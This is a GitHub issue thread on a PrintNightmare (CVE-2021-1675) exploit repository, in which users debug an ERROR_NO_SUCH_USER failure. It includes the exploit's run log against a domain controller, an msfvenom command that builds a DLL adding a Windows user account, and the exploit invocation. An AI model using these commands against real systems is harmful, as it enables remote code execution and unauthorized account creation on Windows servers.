cube0x0 / CVE-2021-1675

C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527

ERROR_NO_SUCH_USER #10

Closed hdbreaker closed 3 years ago

hdbreaker commented 3 years ago

The exploit fails, after a successful connection, bind, and dll upload with error ERROR_NO_SUCH_USER:

[Screenshot: Screen Shot 2021-06-30 at 12 50 58]

hdbreaker commented 3 years ago

With a local file on the DC it does not fail, but no reverse shell was executed:

[*] Try 1...
[*] Connecting to ncacn_np:192.168.10.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3138b2c823dd1ea9\Amd64\UNIDRV.DLL
[*] Executing C:\addCube.dll
[*] Stage0: 0
[*] Try 2...
[*] Connecting to ncacn_np:192.168.10.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3138b2c823dd1ea9\Amd64\UNIDRV.DLL
[*] Executing C:\addCube.dll
[*] Stage0: 0
[*] Try 3...
[*] Connecting to ncacn_np:192.168.10.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3138b2c823dd1ea9\Amd64\UNIDRV.DLL
[*] Executing C:\addCube.dll
[*] Stage0: 0

C0nd4 commented 3 years ago

When hosting using Samba on Linux, did you run # useradd smbuser? If not, you'll probably get that error if using the provided smb.conf.

hdbreaker commented 3 years ago

Okay, I'm able to exploit it but the DLL is not being executed. I created it with:

./msfvenom -p windows/x64/exec CMD="net user XXXX XXXXX /add" -o ~/Desktop/addCube.dll

I manually copied it to the vulnerable server in C:\ and I executed it with:

python3 CVE-2021-1675.py xxxxx:xxxxxxxx@192.168.10.10 'C:\addCube.dll'

Exactly the same is happening with a remote DLL!

No AV on the target. Do you know what could be happening?

hdbreaker commented 3 years ago

I found my way to make it work! Thanks for your support!

BlackSnufkin commented 3 years ago

Can you share please, since I got the same error?

pr0t0nus3rxyz commented 3 years ago

@hdbreaker can you share how you got it to work?